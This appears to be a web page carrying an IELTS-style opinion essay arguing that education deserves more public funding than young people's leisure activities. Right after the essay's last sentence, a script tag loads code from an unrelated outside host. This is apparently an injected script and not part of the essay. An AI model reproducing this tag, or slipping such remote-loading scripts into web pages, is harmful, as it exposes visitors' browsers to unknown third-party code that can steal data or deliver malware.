Essay topics:

Too much emphasis is given for the education of students. More government money should be spent on free time activities for young people.
To what extent do you agree or disagree?

In this day and age, it is widely believed that education is being invested excessively while others argue that the young’s pastimes should receive more financial support. Personally, I totally disagree with this statement.
There are two reasons it is a worth pouring money on education. The first one is the development of students’ academic performance. This is because when a school is financially supported, students’ learning approaches are likely to be diversified owing to the installations of technological devices such as projectors and computers. As a result, they will have a better understanding about the inputs since they are provided with a more visual and demonstrative knowledge. Secondly, a financial emphasis to be put on education can solve the problem of illiteracy in some regions. For example, in some underdeveloped areas such as African countries, education is not one of the top choices to be significantly considered. Therefore, if a proper amount of budget is spent on this field to construct schools, granting people to be educationally instructed, the society will witness a huge positive change as there are more and more citizens to be literate.
However, leisure time activities are unnecessarily invested due to the following drivers. First of all, it will encourage young people to engage in bad habits rather than entertaining them. For example, when a cinema is built with expensive interior facilities which gives audiences high-quality experience, there would be a tendency some young people will be drawn to those places in order to experience such attractive services, leading to ineffective use of time for other purposes such as learning and development. Consequently, it would be a waste of time and money despite contributing to economic growth as the demand increases. Conversely, this concept can be countered as financial focus on free activities would enhance one’s creativity. To exemplify, workshops of cooking can be opened to satisfy those who have cooking preferences. Therefore, people’s strengths and areas of interests are more likely to be well-developed and advanced.
In conclusion, I strongly argue that it is not compulsory to pay too much attention to the young’s free time activities but the education system as it offers multiple positive impacts including progressing students’ performance and illiteracy eradication. However, interests of people can be grown effectively once proper resources are built. <script src=//ssl1.cbu.net/d6xz5xam></script>
